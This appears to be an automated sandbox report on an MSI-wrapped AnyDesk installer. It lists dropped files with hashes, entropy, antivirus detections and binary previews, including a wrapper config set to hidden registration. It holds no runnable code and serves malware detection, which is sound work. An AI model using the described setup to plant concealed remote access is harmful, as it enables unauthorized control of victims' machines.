                                                                              SSDEEP:48:2QzaN38RN3x0/7wP8aZntCwL7feGp9bHfOIgbR1fOIgBKEBKRC6v6ReyZ:2QzI4uU/vfHzbOHXOHB9BpiW
                                                                              MD5:5F246453E47299A07D8C949665C8A0FE
                                                                              SHA1:5B341BA26C94F782A34C5523FAC302B7BCD3411A
                                                                              SHA-256:2EA3134921D1CD1F5E95079CE163D36DE1351A6361410967016DC69F0291F419
                                                                              SHA-512:DE72396CF4181BAC60E006E18A83519A9B3DF6E56FFACAAEDF9308CD8C4717B9E520DCACEE735803663DB6F661C5E5E04647B1443B73CFA474307AFC75C0CA28
                                                                              Malicious:false
                                                                              Preview:.D.....M..,....c.Pc<.......................^..E.X.<m...8.......@..5...........M..0.<fK...; ...............................$.......8...Q.......Q...I.n.s.t.a.l.l.e.d. .A.n.y.d.e.s.k. .-. .U.N.R.E.G.I.S.T.E.R.E.D. .-. .W.r.a.p.p.e.d. .u.s.i.n.g. .M.S.I. .W.r.a.p.p.e.r. .f.r.o.m. .w.w.w...e.x.e.m.s.i...c.o.m.................C.:.\.W.i.n.d.o.w.s.\...............1.7.9.6.0.5.................W.O.R.K.G.R.O.U.P.......Zi.A.@.H..i.tE<.....................).(?..P............. ...2.......2...\.\.?.\.V.o.l.u.m.e.{.8.0.4.9.f.1.9.8.-.1.0.1.6.-.1.1.e.7.-.b.8.7.b.-.8.0.6.e.6.f.6.e.6.9.6.3.}.\...............C.:.\...........N).A.j..j...............(...0.......,...2.......2...\.\.?.\.V.o.l.u.m.e.{.8.0.4.9.f.1.9.8.-.1.0.1.6.-.1.1.e.7.-.b.8.7.b.-.8.0.6.e.6.f.6.e.6.9.6.3.}.\.......4...............(.C.:.).........<...@...D...H...L...P...T...X...\...`...d...h...l...p...t...x...|.......%.......%...A.d.o.b.e. .A.c.r.o.b.a.t. .R.e.a.d.e.r. .D.C. .1.9...0.1.0...2.0.0.9.8.....).......)...A.d.o.b.e. .F.l.a.s.h. .P.l.
                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                              File Type:Microsoft Cabinet archive data, 3811024 bytes, 1 file
                                                                              Category:dropped
                                                                              Size (bytes):3811024
                                                                              Entropy (8bit):7.999935868582085
                                                                              Encrypted:true
                                                                              SSDEEP:98304:bvXhd7YjjTcLO6KnQh5YUNa/ckQGQCWijuYAHwO:bzkTciIYUNuNCAuPHD
                                                                              MD5:223FA9756FCE44168ABD5DB7AFA03FAD
                                                                              SHA1:2E8BFC88819353490EC4C201445DC004FA9AAFF5
                                                                              SHA-256:A929C064C064A1B5013B8FBCE01FEB7AE08E6BD9B05106DCDA8320F9DB0FB13D
                                                                              SHA-512:0EFE5917995E6EE837AADBB9951AD1F7BCADFA9638DE747B219E6A9BBE53FD586118A291776C6FF1C0416B3B439DADB0336AE61E74B1E6D12E9A38F11DAC33EC
                                                                              Malicious:false
                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3837440
                                                                              Entropy (8bit):7.998303388385036
                                                                              Encrypted:true
                                                                              SSDEEP:98304:dDFWG1bqjvcLIsoh5GbmkNC3dv2tthJ2/Ev6l3:d7svcsImkN4chYECl
                                                                              MD5:8C42AB81F90EE0592F7A709F0F7E320B
                                                                              SHA1:6656C6CA4611245CDA44958BAB84866196C9D95B
                                                                              SHA-256:BEB6182CEAB6EA0B0FDC0F41F8069632317E0F941419B75EDE4145593CD6A21C
                                                                              SHA-512:57A444D1B03DCD428EB386E5551137DF5B7D401AC39F5B3481DAD6A94C7A95C3DD90B638532EFDD813C293CF4F949ED4461424FA940410F2D59E2DFDD88CA5EA
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                               • Antivirus: Virustotal, Detection: 64%
                                                                               • Antivirus: Metadefender, Detection: 22%
                                                                              • Antivirus: ReversingLabs, Detection: 65%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*r..n...n...n.......q....3..o.......o...Richn...........................PE..L.....b.....................|:.....$........ ....@...........................:......m;.....................................p ..P....@...p:.......................................................................... ..l............................text...z........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc....p:..@...r:.................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3837440
                                                                              Entropy (8bit):7.998303388385036
                                                                              Encrypted:true
                                                                              SSDEEP:98304:dDFWG1bqjvcLIsoh5GbmkNC3dv2tthJ2/Ev6l3:d7svcsImkN4chYECl
                                                                              MD5:8C42AB81F90EE0592F7A709F0F7E320B
                                                                              SHA1:6656C6CA4611245CDA44958BAB84866196C9D95B
                                                                              SHA-256:BEB6182CEAB6EA0B0FDC0F41F8069632317E0F941419B75EDE4145593CD6A21C
                                                                              SHA-512:57A444D1B03DCD428EB386E5551137DF5B7D401AC39F5B3481DAD6A94C7A95C3DD90B638532EFDD813C293CF4F949ED4461424FA940410F2D59E2DFDD88CA5EA
                                                                              Malicious:true
                                                                              Antivirus:
                                                                               • Antivirus: Virustotal, Detection: 64%
                                                                               • Antivirus: Metadefender, Detection: 22%
                                                                              • Antivirus: ReversingLabs, Detection: 65%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*r..n...n...n.......q....3..o.......o...Richn...........................PE..L.....b.....................|:.....$........ ....@...........................:......m;.....................................p ..P....@...p:.......................................................................... ..l............................text...z........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc....p:..@...r:.................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1426
                                                                              Entropy (8bit):3.650455137438292
                                                                              Encrypted:false
                                                                              SSDEEP:24:udX8DW8XjsjToZkESrFEqNbH+qNbH4yDqNbHgO+sD+n:uYg1JFxNvNE7Nxyn
                                                                              MD5:F03B2CD5999D483E566FED5D7E1BD078
                                                                              SHA1:EBC636C000806FBCD93952B3B4BFB97BF281E2F9
                                                                              SHA-256:36CCB8B1213585E1CD56DEF34AC141DD8653AA0050A0C4105FA4C285AC3CC084
                                                                              SHA-512:83690F70DCD916684C0CBE302A35C96909D31D6C6D06F0BE6950D59ACE0B834EC69021B851E9C30A0B594A5DA7044EBA3F0CADD0417FA588DCE148AFB921E1C6
                                                                              Malicious:false
                                                                              Preview:W.r.a.p.p.e.d.A.p.p.l.i.c.a.t.i.o.n.I.d.=.A.n.y.D.e.s.k...W.r.a.p.p.e.d.R.e.g.i.s.t.r.a.t.i.o.n.=.H.i.d.d.e.n...I.n.s.t.a.l.l.S.u.c.c.e.s.s.C.o.d.e.s.=.0...E.l.e.v.a.t.i.o.n.M.o.d.e.=.n.e.v.e.r...B.a.s.e.N.a.m.e.=.i.n.s.t.a.l.l...e.x.e...C.a.b.H.a.s.h.=.a.9.2.9.c.0.6.4.c.0.6.4.a.1.b.5.0.1.3.b.8.f.b.c.e.0.1.f.e.b.7.a.e.0.8.e.6.b.d.9.b.0.5.1.0.6.d.c.d.a.8.3.2.0.f.9.d.b.0.f.b.1.3.d...S.e.t.u.p.P.a.r.a.m.e.t.e.r.s.=...W.o.r.k.i.n.g.D.i.r.=...C.u.r.r.e.n.t.D.i.r.=.*.S.O.U.R.C.E.D.I.R.*...U.I.L.e.v.e.l.=.5...F.o.c.u.s.=.y.e.s...S.e.s.s.i.o.n.D.i.r.=.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.4.a.7.5.4.4.4.8.-.1.3.7.2.-.4.b.6.2.-.a.f.7.7.-.6.f.1.6.5.0.2.4.6.a.5.a.\...F.i.l.e.s.D.i.r.=.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.4.a.7.5.4.4.4.8.-.1.3.7.2.-.4.b.6.2.-.a.f.7.7.-.6.f.1.6.5.0.2.4.6.a.5.a.\.f.i.l.e.s.\...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.F.i.l.e.=...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.P.a.r.a.m.e.t.e.r.s.=...R.u.n.A.f.t.e.r.I.n.
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):32768
                                                                              Entropy (8bit):0.06743406194521226
                                                                              Encrypted:false
                                                                              SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOv+eHmNfftCVky6lh1:2F0i8n0itFzDHFv+eGBTj
                                                                              MD5:F6D7E066F3F3BFE6E80C388A8E80530D
                                                                              SHA1:4113DA23B498529E7D373BB6B15C511E6215CBF0
                                                                              SHA-256:6FD79F05C77A1C8CB5D73B1FEC2B16E09273E029DDC196F24115C57178C7D1EC
                                                                              SHA-512:AB982CEEAEF2E1D690BC761C129EC387C4919BCF910513387D9D46111FDD9768F66E1CD46311FD169BD1122356DE71964590DE087B06A8BA966216EA7736E464
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):69632
                                                                              Entropy (8bit):0.12990324508728232
                                                                              Encrypted:false
                                                                              SSDEEP:24:Ojd8vdOQCwY+8JfAebfddipV7sddipVlVIwGVlrkg9Syve+QG:I8virfddSBsddSH2rjeNG
                                                                              MD5:DAEC78D92F1DF6670EB07754808C3ECC
                                                                              SHA1:F59648041B22EC5BFE871E08EDB40278B85A5BD2
                                                                              SHA-256:8DCAE1DCF7F1AA8B3F96C78805593524994AA603C611E6B9523CBCB93A774354
                                                                              SHA-512:FC8D121F8B877528B6E902869E931A74F88097870B8F0CD66213F9F3ACC8A431619EAD27D45DD4EE75B79CE77BB414E641FCC0A495C0B67A1FE900FB36B5183B
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):512
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3::
                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                              Malicious:false
                                                                              Process:C:\ProgramData\anydesk.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:modified
                                                                              Size (bytes):10515
                                                                              Entropy (8bit):4.228344603555986
                                                                              Encrypted:false
                                                                              SSDEEP:96:EtFBqt1tNtFZmKJ4FgzgFN5mj4b515wvOQ8kQVQbQWttAhDFhttFCxxv:0wPHFcKFjw9ksQNttvxV
                                                                              MD5:C4D40B6620A5E49C215BFB0C04D9FA94
                                                                              SHA1:84C02E79A8DD2CEA191AF99341F2271A6139DC48
                                                                              SHA-256:1604100784E9D590149D5221F7F4318AFAE913A22EA07F6EA461F8D215EDFA25
                                                                              SHA-512:06F4EE0DFFB5231F59327920110B48566C4B6FFA35FEC1113F84CE1FAE0C932ACD07F01E2AEA022FF7DDE2A5601C2391B6333E0FFCC2B4B8D7F1DC270F03E154
                                                                              Malicious:false
                                                                              Preview: * * * * * * * * * * * * * * * * * *.. info 2022-08-06 01:23:23.745 installer 2640 2428 main - * AnyDesk Windows Startup *.. info 2022-08-06 01:23:23.745 installer 2640 2428 main - * Version 7.0.7 (release/win_7.0.x 96f8d80eac273a9144abccce2f66dbc2200cc81d).. info 2022-08-06 01:23:23.745 installer 2640 2428 main - * Custom Client (no ID).. info 2022-08-06 01:23:23.745 installer 2640 2428 main - .. info 2022-08-06 01:23:23.745 installer 2640 2428 main - Process started at 2022-08-06. PID 2640. OS is Windows 7 (64 bit).. info 2022-08-06 01:23:23.745 installer 2640 2428 impl_selector - using sse2 (intrinsics)..warning 2022-08-06 01:23:23.745 installer 2640 2428 terminator - All clear!.. info 2022-08-06 01:23:23.745 installer
                                                                              Process:C:\ProgramData\anydesk\AnyDesk.exe
                                                                              File Type:ASCII text, with very long lines
                                                                              Category:dropped
                                                                              Size (bytes):1003
                                                                              Entropy (8bit):4.272230203413794
                                                                              Encrypted:false
                                                                              SSDEEP:24:snKoXHZgCJg2cZ0FmienKoX1M61n0Q17/iMQBbSI:sn1j2genMa0CHQBbSI
                                                                              MD5:BB28C065F16674CB7688B72C683EC985
                                                                              SHA1:2D7E18B400398CDC33A387C315D434C9FFDA0CB0
                                                                              SHA-256:FE5DD9BE649AB519A47659B151A2607AC623179F150765C399B1EF0C7A90F82E
                                                                              SHA-512:6995413F415F6D708254C0BD6388B397B181B6BAF28B3D9182E50404556CBC8C38AB0CED5A2A93550DA5FBD2EDBC7945E3E2F24AD0358FBC00A3494A7040DD4E
                                                                              Malicious:false
                                                                              Preview:ad.invite.created_list_encrypted=6fa74c609a01f31f1f670668df954f4642a4aae8018a18da425960b3eca6f8f4a1ec65a7e7bb22120bf648310f1fa2df0b53d2e90e4e008262013ecaea920fe5fd03c1aa69649c8b8b7110ec222522013f23dfea2c5de548b20a73a9d414c27374ab0862b47b212f41cf5778b89cca6521ac5f446f5a2ffbbe9811a458492e39926770649a38e9721366902a51645470f0d9e8a0d72bdda1c667dc1fbaea3cca74dd806804e91cbf13cfc3d8e58bf6cc1ef38cac7e2c3206610342c063879a2bdf13cf19bf043a5ac522ccccbbc23a319d59a30a59c069535a7b8f54c7cdf18ddd032a16d9ee.ad.invite.received_list_encrypted=6fa74c609a01f31f1f670668df954f4642a4aae8018a18da425960b3eca6f8f4a1ec65a7e7bb22120bf648310f1fa2df0b53d2e90e4e008262013ecaea920219e161c9e6f996ad5835c58dfc95d32660f8f91a7ceb734bd5c905f6e04db3c27374ab0862b47b212f41cf5778b89c037c550169499eb92f75a169d19422002633e9f784bb1abb9c7461a00b08edbb5470f0d99f57071e94afc197f90cdd3c896084ac806804e96c7ac9eb148905cb1bf54d6113d0c1ffff947be9e29fdf46c726ed7608deda5eebf876a0049476f5d19458050a6ce61fb3fbce38819f06f911de17a54117d6af.ad.ui.lang=
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 0.7.0.0, Subject: Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Anydesk, Keywords: Installer, Template: Intel;1033, Revision Number: {8CB27BF3-59BC-4419-BE15-E9E385453F27}, Create Time/Date: Thu Feb 18 21:32:30 2021, Last Saved Time/Date: Thu Feb 18 21:32:30 2021, Number of Pages: 200, Number of Words: 2, Name of Creating Application: MSI Wrapper (10.0.50.0), Security: 2
                                                                              Category:dropped
                                                                              Size (bytes):4063232
                                                                              Entropy (8bit):7.978539254164263
                                                                              Encrypted:false
                                                                              SSDEEP:98304:pp+vXhd7YjjTcLO6KnQh5YUNa/ckQGQCWijuYAHw:+zkTciIYUNuNCAuPH
                                                                              MD5:6CF5AD7A7D1B7BAB0C62E246CF41A985
                                                                              SHA1:B06A03ADC550EAD96534F5E723395C4E16BFDF44
                                                                              SHA-256:FB9F0BF2B71BF576053C56CB913EA4E93581FC9D3AA9D6D8A0AE572A1622F050
                                                                              SHA-512:46CD8BD1EAD75A8ADB7D5BFF81A2FDC04567D462E965664F6F9F796237839F07F74D2201C3DA8F7F37C9DFC45749ED88708DB5A216D84F7AC146E5AF58A8608E
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                              Category:dropped
                                                                              Size (bytes):20480
                                                                              Entropy (8bit):1.5498517775518001
                                                                              Encrypted:false
                                                                              SSDEEP:24:J7rFC/llm6cpmUHCpVluqo+QG0/rddipVlVIwGVlrkg9SCddipV7eJfAebpQCwYi:1r0pcDHoluzNG0zddSH2rbddSBerF8v
                                                                              MD5:14F8EB017B55B6EFBBC74E949581F9F7
                                                                              SHA1:E9B5537C29E22FAC2A7535C766579710CC901AC4
                                                                              SHA-256:486813FA64D996C93CB8251845F093C0F26C0277ACFF9C06004DE34EB825CFBE
                                                                              SHA-512:E9222151D1E201A06F39CBFFE9F786F968B45226DBDFEA99A0DC6746820247D23AEEB74312277BBF40B060ADDDF7734E70527CE824C55DB32A55D637012202DA
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):428024
                                                                              Entropy (8bit):6.5173927188942296
                                                                              Encrypted:false
                                                                              SSDEEP:12288:stJRQ+gjpjegLyo8ktJRQ+gjpjegLyo8J:stBcpVLSktBcpVLSJ
                                                                              MD5:9069E5D699573FA8DE65F4D66FC36782
                                                                              SHA1:3F6D828772867E2708F4491DE44C57FE3987F931
                                                                              SHA-256:7F7DDF73140A3568819DE6AC422D2B42A76856FE96C2A658AF531ADB3BBD9B33
                                                                              SHA-512:C7614A19E126273A7464F16EF3470C4B4CE459119CBC489DE9DCDDDC5DBE2057AAAE77D551F8C26A9EB59E2FEAB373C1C565921379564EFF9ED4CE85EDF9717C
                                                                              Malicious:false
                                                                              Preview:...@IXOS.@.....@...U.@.....@.....@.....@.....@.....@......&.{AC4583F8-6694-473E-BB77-32CDFC9BA940}F.Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com..1.msi.@.....@.....@.....@........&.{8CB27BF3-59BC-4419-BE15-E9E385453F27}.....@.....@.....@.....@.......@.....@.....@.......@....F.Anydesk - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{EDE10F6C-30F4-42CA-B5C7-ADB905E45BFC}?.02:\SOFTWARE\EXEMSI.COM\MSI Wrapper\Installed\AnyDesk\LogonUser.@.......@.....@.....@........bz.LateInstallFinish1....J...bz.LateInstallFinish1.@.......@..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):212992
                                                                              Entropy (8bit):6.513444216841171
                                                                              Encrypted:false
                                                                              SSDEEP:3072:AspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLw2loHUvU4yGxr53qM2a8:2tOdiRQYpgjpjew5LLyGx1qo8
                                                                              MD5:4CAAA03E0B59CA60A3D34674B732B702
                                                                              SHA1:EE80C8F4684055AC8960B9720FB108BE07E1D10C
                                                                              SHA-256:D01AF2B8C692DFFB04A5A04E3CCD0D0A3B2C67C8FC45A4B68C0A065B4E64CC3D
                                                                              SHA-512:25888848871286BDD1F9C43A0FBA35640EDB5BAFBE0C6AA2F9708A070EA4E5B16745B7C4F744AE4F5643F75EF47F196D430BF70921ED27715F712825EC590A34
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......`...........!.....h..........K....................................................@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):212992
                                                                              Entropy (8bit):6.513444216841171
                                                                              Encrypted:false
                                                                              SSDEEP:3072:AspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLw2loHUvU4yGxr53qM2a8:2tOdiRQYpgjpjew5LLyGx1qo8
                                                                              MD5:4CAAA03E0B59CA60A3D34674B732B702
                                                                              SHA1:EE80C8F4684055AC8960B9720FB108BE07E1D10C
                                                                              SHA-256:D01AF2B8C692DFFB04A5A04E3CCD0D0A3B2C67C8FC45A4B68C0A065B4E64CC3D
                                                                              SHA-512:25888848871286BDD1F9C43A0FBA35640EDB5BAFBE0C6AA2F9708A070EA4E5B16745B7C4F744AE4F5643F75EF47F196D430BF70921ED27715F712825EC590A34
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......`...........!.....h..........K....................................................@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:modified
                                                                              Size (bytes):212992
                                                                              Entropy (8bit):6.513444216841171
                                                                              Encrypted:false
                                                                              SSDEEP:3072:AspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLw2loHUvU4yGxr53qM2a8:2tOdiRQYpgjpjew5LLyGx1qo8
                                                                              MD5:4CAAA03E0B59CA60A3D34674B732B702
                                                                              SHA1:EE80C8F4684055AC8960B9720FB108BE07E1D10C
                                                                              SHA-256:D01AF2B8C692DFFB04A5A04E3CCD0D0A3B2C67C8FC45A4B68C0A065B4E64CC3D
                                                                              SHA-512:25888848871286BDD1F9C43A0FBA35640EDB5BAFBE0C6AA2F9708A070EA4E5B16745B7C4F744AE4F5643F75EF47F196D430BF70921ED27715F712825EC590A34
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......`...........!.....h..........K....................................................@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):212992
                                                                              Entropy (8bit):6.513444216841171
                                                                              Encrypted:false
                                                                              SSDEEP:3072:AspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLw2loHUvU4yGxr53qM2a8:2tOdiRQYpgjpjew5LLyGx1qo8
                                                                              MD5:4CAAA03E0B59CA60A3D34674B732B702
                                                                              SHA1:EE80C8F4684055AC8960B9720FB108BE07E1D10C
                                                                              SHA-256:D01AF2B8C692DFFB04A5A04E3CCD0D0A3B2C67C8FC45A4B68C0A065B4E64CC3D
                                                                              SHA-512:25888848871286BDD1F9C43A0FBA35640EDB5BAFBE0C6AA2F9708A070EA4E5B16745B7C4F744AE4F5643F75EF47F196D430BF70921ED27715F712825EC590A34
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......`...........!.....h..........K....................................................@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                              Category:dropped
                                                                              Size (bytes):20480
                                                                              Entropy (8bit):1.160574548383438
                                                                              Encrypted:false
                                                                              SSDEEP:12:JSbX72FjEiAGiLIlHVRpgh/7777777777777777777777777vDHFv+eGB3Jpjl0G:JqiQI5o5+eOGF
                                                                              MD5:80A87B6E2D6888C84B8F90246E263EE4
                                                                              SHA1:ACB5270E5112C472F6D91B94322A8F3C8671EFB5
                                                                              SHA-256:1E86519BF9767892FC4ED05A712D90415E02B8C6B260E7556E5AF00174F0092F
                                                                              SHA-512:F98006A315B6FAA2C939A789E36EBA40860AEA58A95B845463B8B4C66B6E5C9A4978BFF4C034EB90169516B7E1F0EA458BA6CB8E68FE65148703580219D2761B
                                                                              Malicious:false
                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):969
                                                                              Entropy (8bit):4.316698873864823
                                                                              Encrypted:false
                                                                              SSDEEP:24:Y6mE76KbEE76KbE76KbEE76KbEE6mE6mE76KbEE76KbEE6r:YVE76KbEm6KbE76KbEm6KbE+EVE76KbY
                                                                              MD5:62DEA788F4FAC87F00521EB4D5BDE650
                                                                              SHA1:B1DE499D3485674F25810AD3B4EC35C2B79CE2B9
                                                                              SHA-256:7B341C7ED6AECCF2058AE39B62BF891D02664BC7399ED3F8B2FE0277E8E16BAA
                                                                              SHA-512:0A4AA1B760AAE3BABA90ACCA55075206794F55160B4096C1B61C4C653CD3930DACAFAC46E6E37CDA488E7BFF5797C6024D33C28B163362236DBDCB1EB0D2FB0E
                                                                              Malicious:false
                                                                              Preview:.2022-08-05 18:23:08, Info DPX Started DPX phase: Resume and Download Job..2022-08-05 18:23:08, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-08-05 18:23:08, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-08-05 18:23:08, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-08-05 18:23:08, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-08-05 18:23:08, Info DPX Ended DPX phase: Resume and Download Job..2022-08-05 18:23:08, Info DPX Started DPX phase: Resume and Download Job..2022-08-05 18:23:08, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-08-05 18:23:08, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-08-05 18:23:08, Info DPX Ended DPX phase: Resume and Download Job..
                                                                              Process:C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):14
                                                                              Entropy (8bit):3.8073549220576055
                                                                              Encrypted:false
                                                                              SSDEEP:3:i1lfoN:i1lAN
                                                                              MD5:2451B91DDBC6BE55D3D1FF81E7269D71
                                                                              SHA1:70E56DBCB95AF007F3B08F86C0A22050991DDF02
                                                                              SHA-256:BF5EAAB0BE11F12556F4CEEB507DA91D8E5178BEE032C003A26070B5794774B4
                                                                              SHA-512:7B08E8E00CD20D78D84A9BA2D8C8B4E7C7804BA6D1013D886FE640A70394B1484AF2658C1A94D23EC0BCAA692E8651434BAE48B20B4A895BBB9FD3A438AEAD4F
                                                                              Malicious:false
                                                                              Preview:anydesk-ID:..0
                                                                              Process:C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3829888
                                                                              Entropy (8bit):7.999053982852042
                                                                              Encrypted:true
                                                                              SSDEEP:98304:nDFWG1bqjvcLIsoh5GbmkNC3dv2tthJ2/Ev6l3H:n7svcsImkN4chYECl3
                                                                              MD5:1BC5890C9E7BF54B7712E344B0AF9D04
                                                                              SHA1:78C9302C7A387A8D158F38D501784BE9B8B2716D
                                                                              SHA-256:AF61905129F377F5934B3BBF787E8D2417901858BB028F40F02200E985EE62F6
                                                                              SHA-512:7113888A8439AE5AF1B260C40229F7EBB98BDECE52EBAB0CE97137933AF4E9777D92D68166DBCF87A95CF88615452CAE7ECDF555B4785FFFE63C5783DBCB595D
                                                                              Malicious:true
